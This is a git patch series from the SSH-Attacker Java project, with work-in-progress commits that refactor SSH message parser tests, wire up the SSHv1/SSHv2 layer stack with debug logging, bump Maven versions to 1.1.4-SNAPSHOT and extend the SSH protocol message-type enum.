a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.ServiceType; import de.rub.nds.sshattacker.core.protocol.transport.message.ServiceAcceptMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -44,8 +45,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, ServiceType expectedServiceType) { - ServiceAcceptMessageParser parser = new ServiceAcceptMessageParser(providedBytes); - ServiceAcceptMessage msg = parser.parse(); + ServiceAcceptMessageParser parser = + new ServiceAcceptMessageParser(new ByteArrayInputStream(providedBytes)); + ServiceAcceptMessage msg = new ServiceAcceptMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_SERVICE_ACCEPT.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParserTest.java index 0d14e3c0e..28eb43b34 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceRequestMessageParserTest.java @@ -13,6 +13,7 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.ServiceType; import de.rub.nds.sshattacker.core.protocol.transport.message.ServiceRequestMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -44,8 +45,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, ServiceType expectedServiceType) { - ServiceRequestMessageParser parser = new ServiceRequestMessageParser(providedBytes); - ServiceRequestMessage msg = parser.parse(); + ServiceRequestMessageParser parser = + new ServiceRequestMessageParser(new ByteArrayInputStream(providedBytes)); + ServiceRequestMessage msg = new ServiceRequestMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_SERVICE_REQUEST.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParserTest.java index 38fbe0e4f..ff7886de1 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/UnimplementedMessageParserTest.java @@ -12,6 +12,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.protocol.transport.message.UnimplementedMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -41,8 +42,10 @@ public static Stream provideTestVectors() { @ParameterizedTest @MethodSource("provideTestVectors") public void testParse(byte[] providedBytes, int expectedSequenceNumber) { - UnimplementedMessageParser parser = new UnimplementedMessageParser(providedBytes); - UnimplementedMessage msg = parser.parse(); + UnimplementedMessageParser parser = + new UnimplementedMessageParser(new ByteArrayInputStream(providedBytes)); + UnimplementedMessage msg = new UnimplementedMessage(); + parser.parse(msg); assertEquals( MessageIdConstant.SSH_MSG_UNIMPLEMENTED.getId(), msg.getMessageId().getValue()); diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParserTest.java index a9db86d7d..650a65916 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParserTest.java @@ -11,6 +11,7 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; +import java.io.ByteArrayInputStream; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; @@ -52,8 +53,10 @@ public void testParse( String expectedVersion, String expectedComment, String expectedEndOfMessageSequence) { - VersionExchangeMessageParser parser = new VersionExchangeMessageParser(providedBytes); - VersionExchangeMessage msg = parser.parse(); + VersionExchangeMessageParser parser = + new VersionExchangeMessageParser(new ByteArrayInputStream(providedBytes)); + VersionExchangeMessage msg = new VersionExchangeMessage(); + parser.parse(msg); assertEquals(expectedVersion, msg.getVersion().getValue()); assertEquals(expectedComment, msg.getComment().getValue()); From 0c15fc2837e8878ff3334c27383b91aebf813900 Mon Sep 17 00:00:00 2001 From: Steffen Date: Sat, 10 Jun 2023 15:50:17 +0200 Subject: [PATCH 011/176] wip: LayerStack is compiling but does not work properly, fixing some bugs --- .idea/misc.xml | 2 +- .../nds/sshattacker/core/config/Config.java | 2 ++ .../sshattacker/core/layer/LayerStack.java | 2 ++ .../core/layer/LayerStackFactory.java | 19 +++++++++++++++++-- .../core/layer/impl/SSH2Layer.java | 4 ++++ .../sshattacker/core/layer/impl/TcpLayer.java | 2 ++ .../core/layer/impl/TransportLayer.java | 8 +++++++- .../core/packet/AbstractPacket.java | 11 +++++++++++ .../core/packet/parser/BlobPacketParser.java | 8 ++++---- .../nds/sshattacker/core/state/Context.java | 1 + .../rub/nds/sshattacker/core/state/State.java | 3 ++- .../core/workflow/WorkflowExecutor.java | 1 + .../core/workflow/action/MessageAction.java | 6 +++--- .../core/workflow/action/ReceiveAction.java | 2 ++ 14 files changed, 59 insertions(+), 12 deletions(-) diff --git a/.idea/misc.xml b/.idea/misc.xml index 45478c708..1465bc128 100644 --- a/.idea/misc.xml +++ b/.idea/misc.xml @@ -8,5 +8,5 @@ - + \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index 0a89683f6..854f4eaec 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -473,6 +473,8 @@ public Config() { defaultClientConnection = new OutboundConnection("client", 65222, "localhost"); defaultServerConnection = new InboundConnection("server", 65222, "localhost"); + defaultLayerConfiguration = LayerConfiguration.SSHv2; + // region VersionExchange initialization clientVersion = "SSH-2.0-OpenSSH_9.0"; clientComment = ""; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java index d1fd0d1fe..ebfea7a22 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -139,6 +139,8 @@ public LayerStackProcessingResult receiveData(List layerConf } context.setTalkingConnectionEndType( context.getConnection().getLocalConnectionEndType().getPeer()); + + LOGGER.debug("[bro] Recieving on Layer: " + getLayerList().get(0).getLayerType()); getLayerList().get(0).receiveData(); // reverse order for (int i = getLayerList().size() - 1; i >= 0; i--) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java index b020bd9cd..c72dc9d4f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStackFactory.java @@ -12,6 +12,8 @@ import de.rub.nds.sshattacker.core.layer.context.TcpContext; import de.rub.nds.sshattacker.core.layer.impl.*; import de.rub.nds.sshattacker.core.state.Context; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; /** * Creates a layerStack based on pre-defined configurations. E.g., to send TLS messages with @@ -19,9 +21,12 @@ * TcpLayer. Each layer is assigned a different context. */ public class LayerStackFactory { + private static final Logger LOGGER = LogManager.getLogger(); public static LayerStack createLayerStack(LayerConfiguration type, Context context) { + LOGGER.debug("Creating Layerstack for type: " + type); + LayerStack layerStack; SshContext sshContext = context.getSshContext(); TcpContext tcpContext = context.getTcpContext(); @@ -65,9 +70,19 @@ public static LayerStack createLayerStack(LayerConfiguration type, Context conte case SSHv1: layerStack = new LayerStack( - context, new SSH1Layer(sshContext), new TcpLayer(tcpContext)); + context, + new SSH1Layer(sshContext), + new TransportLayer(sshContext), + new TcpLayer(tcpContext)); + return layerStack; + case SSHv2: + layerStack = + new LayerStack( + context, + new SSH2Layer(sshContext), + new TransportLayer(sshContext), + new TcpLayer(tcpContext)); return layerStack; - default: throw new RuntimeException("Unknown LayerStackType: " + type.name()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index d78e14c95..a936e2ff8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -158,17 +158,21 @@ public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additiona @Override public LayerProcessingResult receiveData() { + LOGGER.debug("[bro] SSH-Layer ist Recieving Data now"); try { HintedInputStream dataStream; do { try { + LOGGER.debug("[bro] I´m here"); dataStream = getLowerLayer().getDataStream(); + LOGGER.debug("[bro] I was here"); } catch (IOException e) { // the lower layer does not give us any data so we can simply return here LOGGER.warn("The lower layer did not produce a data stream: ", e); return getLayerResult(); } + LOGGER.debug("[bro] Searching for Hint"); LayerProcessingHint tempHint = dataStream.getHint(); if (tempHint == null) { LOGGER.warn( diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index 7ae0f6992..7bca3f2dc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -66,6 +66,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException @Override public HintedInputStream getDataStream() { getTransportHandler().setTimeout(getTransportHandler().getTimeout()); + LOGGER.debug("[bro] TCP-Layer is transmitting Datastream now"); currentInputStream = new HintedInputStreamAdapterStream(null, getTransportHandler().getInputStream()); return currentInputStream; @@ -73,6 +74,7 @@ public HintedInputStream getDataStream() { @Override public LayerProcessingResult receiveData() { + LOGGER.debug("TCP-Layer ist Recieving Data now"); return new LayerProcessingResult(null, getLayerType(), true); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java index beb4f9ed0..8aaa4228b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java @@ -303,7 +303,6 @@ private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) @Override public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { - InputStream dataStream = getLowerLayer().getDataStream(); AbstractPacketParser parser; AbstractPacket packet; @@ -324,9 +323,16 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException parser.parse(packet); + LOGGER.debug( + "[bro] Recieved Packet: " + packet.getPayload() + " | " + packet.getCiphertext()); + context.getPacketLayer().getDecryptor().decrypt(packet); context.getPacketLayer().getDecompressor().decompress(packet); addProducedContainer(packet); + + PacketLayerHint currentHint; + + currentHint = new PacketLayerHint(packet.getContentMessageType()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index 8be45c9bb..3107142b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -10,6 +10,7 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.ModifiableVariableProperty; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.DataContainer; import de.rub.nds.sshattacker.core.protocol.common.ModifiableVariableHolder; @@ -39,6 +40,16 @@ public abstract class AbstractPacket> @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray payload; + public ProtocolMessageType getContentMessageType() { + return contentMessageType; + } + + public void setContentMessageType(ProtocolMessageType contentMessageType) { + this.contentMessageType = contentMessageType; + } + + private ProtocolMessageType contentMessageType; + public AbstractPacket() {} public ModifiableByteArray getCompletePacketBytes() { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java index 9f23734a6..857d09567 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BlobPacketParser.java @@ -29,13 +29,13 @@ public BlobPacketParser(InputStream stream) { public void parse(BlobPacket blobPacket) { LOGGER.debug("Parsing BlobPacket from serialized bytes:"); - BlobPacket packet = new BlobPacket(); - packet.setCiphertext(parseByteArrayField(getBytesLeft())); - packet.setCompletePacketBytes(getAlreadyParsed()); + // BlobPacket packet = new BlobPacket(); + blobPacket.setCiphertext(parseByteArrayField(getBytesLeft())); + blobPacket.setCompletePacketBytes(getAlreadyParsed()); LOGGER.debug( "Complete packet bytes: {}", - ArrayConverter.bytesToHexString(packet.getCompletePacketBytes().getValue())); + ArrayConverter.bytesToHexString(blobPacket.getCompletePacketBytes().getValue())); // return packet; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java index 2925ae73e..772dbec88 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/Context.java @@ -177,6 +177,7 @@ public String toString() { } public void prepareWithLayers(LayerConfiguration type) { + LOGGER.debug("[bro] Layerstack-1"); sshContext = new SshContext(this); tcpContext = new TcpContext(this); layerStack = LayerStackFactory.createLayerStack(type, this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java index 271f67022..a7d2ddf7b 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java @@ -129,9 +129,10 @@ public final void initState() { WorkflowTraceNormalizer normalizer = new WorkflowTraceNormalizer(); normalizer.normalize(workflowTrace, config, runningMode); - + LOGGER.debug("[bro] Layerstack-2"); for (AliasedConnection con : workflowTrace.getConnections()) { Context ctx = new Context(config, con); + LayerStack layerStack = LayerStackFactory.createLayerStack(config.getDefaultLayerConfiguration(), ctx); ctx.setLayerStack(layerStack); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index 7841b05e2..8e0abd479 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -90,6 +90,7 @@ public WorkflowExecutor(WorkflowExecutorType type, State state) { public abstract void executeWorkflow() throws WorkflowExecutionException; public void initProtocolStack(Context context) throws IOException { + LOGGER.debug("[bro] Layerstack-3"); context.setLayerStack( LayerStackFactory.createLayerStack(config.getDefaultLayerConfiguration(), context)); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index e034f1ed5..f305d026a 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -163,12 +163,12 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement(type = VersionExchangeMessage.class, name = "VersionExchange"), @XmlElement(type = AsciiMessage.class, name = "AsciiMessage") }) - @XmlTransient - private LayerStackProcessingResult layerStackProcessingResult; - protected List> messages = new ArrayList<>(); + protected List sessions = new ArrayList<>(); + @XmlTransient private LayerStackProcessingResult layerStackProcessingResult; + // @XmlTransient protected final ReceiveMessageHelper receiveMessageHelper; // @XmlTransient protected final SendMessageHelper sendMessageHelper; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index a85ad7f62..57644caaa 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -232,6 +232,8 @@ public ReceiveAction(String connectionAliasAlias, ProtocolMessage... messages public void execute(State state) throws WorkflowExecutionException { SshContext context = state.getSshContext(getConnectionAlias()); + LOGGER.debug("[bro] Recieving Messages"); + if (isExecuted()) { throw new WorkflowExecutionException("Action already executed!"); } From 6f160b027803cf3a3969fb4ade9318034eb04d0c Mon Sep 17 00:00:00 2001 From: Steffen Date: Sat, 10 Jun 2023 16:00:35 +0200 Subject: [PATCH 012/176] wip: Setting dev-Version to 1.1.4-SNAPSHOT --- SSH-Client/pom.xml | 2 +- SSH-Core/pom.xml | 2 +- SSH-Server/pom.xml | 2 +- pom.xml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/SSH-Client/pom.xml b/SSH-Client/pom.xml index d3352a13f..672f89cdb 100755 --- a/SSH-Client/pom.xml +++ b/SSH-Client/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.3-SNAPSHOT + 1.1.4-SNAPSHOT ssh-client diff --git a/SSH-Core/pom.xml b/SSH-Core/pom.xml index ab3e09c02..45e0749eb 100755 --- a/SSH-Core/pom.xml +++ b/SSH-Core/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.3-SNAPSHOT + 1.1.4-SNAPSHOT ssh-core diff --git a/SSH-Server/pom.xml b/SSH-Server/pom.xml index d284292e0..ca85633e7 100644 --- a/SSH-Server/pom.xml +++ b/SSH-Server/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.3-SNAPSHOT + 1.1.4-SNAPSHOT ssh-server diff --git a/pom.xml b/pom.xml index 3467309d0..5e28b8d6d 100644 --- a/pom.xml +++ b/pom.xml @@ -9,7 +9,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.3-SNAPSHOT + 1.1.4-SNAPSHOT pom SSH-Attacker From 1d5eaf2224bf1f56b407dc39b7d70a39053a3951 Mon Sep 17 00:00:00 2001 From: Steffen Date: Sat, 10 Jun 2023 16:01:38 +0200 Subject: [PATCH 013/176] wip: Upgrading rest to dev-Version to 1.1.4-SNAPSHOT --- Attacks/pom.xml | 2 +- SSH-Core-OQS/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Attacks/pom.xml b/Attacks/pom.xml index 7509afe66..caa25e46f 100644 --- a/Attacks/pom.xml +++ b/Attacks/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.3-SNAPSHOT + 1.1.4-SNAPSHOT attacks diff --git a/SSH-Core-OQS/pom.xml b/SSH-Core-OQS/pom.xml index 7ef7b3205..4336cafbc 100644 --- a/SSH-Core-OQS/pom.xml +++ b/SSH-Core-OQS/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.3-SNAPSHOT + 1.1.4-SNAPSHOT ssh-core-oqs From 0207c908a15276aabfa0157e18bc5f5473d0f069 Mon Sep 17 00:00:00 2001 From: Steffen Date: Sun, 11 Jun 2023 00:02:10 +0200 Subject: [PATCH 014/176] wip: recieve for version exchange is now working --- .../core/constants/MessageIdConstant.java | 3 + .../core/constants/ProtocolMessageType.java | 137 ++++++++++++- .../sshattacker/core/layer/ProtocolLayer.java | 3 + .../core/layer/impl/SSH2Layer.java | 8 + .../core/layer/impl/TransportLayer.java | 193 +++++++++++++++++- .../core/packet/AbstractPacket.java | 11 + .../core/packet/cipher/PacketMacedCipher.java | 4 + .../common/ProtocolMessageParser.java | 30 ++- 8 files changed, 377 insertions(+), 12 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java index e3f628b17..0a3ca458f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstant.java @@ -12,11 +12,14 @@ import java.util.*; public enum MessageIdConstant { + /* * Sources: * - https://www.iana.org/assignments/ssh-parameters/ssh-parameters.xhtml#ssh-parameters-1 */ // [ RFC 4253 ] + VERSION_EXCHANGE_MESSAGE((byte) 0), + ASCII_MESSAEG((byte) 20), SSH_MSG_DISCONNECT((byte) 1), SSH_MSG_IGNORE((byte) 2), SSH_MSG_UNIMPLEMENTED((byte) 3), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java index af0b0305a..f9f45ed1f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java @@ -11,22 +11,153 @@ import java.util.Map; public enum ProtocolMessageType { - UNKNOWN((byte) 99), + /* UNKNOWN((byte) 99), CHANGE_CIPHER_SPEC((byte) 20), ALERT((byte) 21), HANDSHAKE((byte) 22), APPLICATION_DATA((byte) 23), HEARTBEAT((byte) 24), - TLS12_CID((byte) 25), + TLS12_CID((byte) 25),*/ AUTHENTICATION((byte) 1), CONNECTION((byte) 2), - TRANSPORT((byte) 3); + TRANSPORT((byte) 3), + + VERSION_EXCHANGE_MESSAGE((byte) 0), + ASCII_MESSAEG((byte) 20), + SSH_MSG_DISCONNECT((byte) 1), + SSH_MSG_IGNORE((byte) 2), + SSH_MSG_UNIMPLEMENTED((byte) 3), + SSH_MSG_DEBUG((byte) 4), + SSH_MSG_SERVICE_REQUEST((byte) 5), + SSH_MSG_SERVICE_ACCEPT((byte) 6), + // [ RFC 8308 ] + SSH_MSG_EXT_INFO((byte) 7), + SSH_MSG_NEWCOMPRESS((byte) 8), + // 9 - 19 unassigned (transport layer generic) + SSH_MSG_KEXINIT((byte) 20), + SSH_MSG_NEWKEYS((byte) 21), + // 22 - 29 unassigned (algorithm negotiation) + // 30 - 49 reserved (key exchange method specific) + // [ RFC 4419 ] + SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + // [ RFC 4253 ] + SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), + SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), + // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] + SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), + SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), + // [ RFC 5656 ] + SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), + SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), + SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), + SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), + // [ RFC 4432 ] + SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), + // [ RFC 4462 ] + // TODO: Add specificTo on GSS messages + SSH_MSG_KEXGSS_INIT((byte) 30), + SSH_MSG_KEXGSS_CONTINUE((byte) 31), + SSH_MSG_KEXGSS_COMPLETE((byte) 32), + SSH_MSG_KEXGSS_HOSTKEY((byte) 33), + SSH_MSG_KEXGSS_ERROR((byte) 34), + SSH_MSG_KEXGSS_GROUPREQ((byte) 40), + SSH_MSG_KEXGSS_GROUP((byte) 41), + // [ RFC 4252 ] + SSH_MSG_USERAUTH_REQUEST((byte) 50), + SSH_MSG_USERAUTH_FAILURE((byte) 51), + SSH_MSG_USERAUTH_SUCCESS((byte) 52), + SSH_MSG_USERAUTH_BANNER((byte) 53), + // 54 - 59 unassigned (user authentication generic) + // 60 - 79 reserved (user authentication method specific) + // [ RFC 4252 ] + SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), + SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), + // [ RFC 4256 ] + SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), + SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), + // [ RFC 4462 ] + SSH_MSG_USERAUTH_GSSAPI_RESPONSE( + (byte) 60, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_TOKEN( + (byte) 61, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( + (byte) 63, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERROR( + (byte) 64, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERRTOK( + (byte) 65, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_MIC( + (byte) 66, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + // [ RFC 4254 ] + SSH_MSG_GLOBAL_REQUEST((byte) 80), + SSH_MSG_REQUEST_SUCCESS((byte) 81), + SSH_MSG_REQUEST_FAILURE((byte) 82), + // 83 - 89 unassigned (connection protocol generic) + SSH_MSG_CHANNEL_OPEN((byte) 90), + SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), + SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), + SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), + SSH_MSG_CHANNEL_DATA((byte) 94), + SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), + 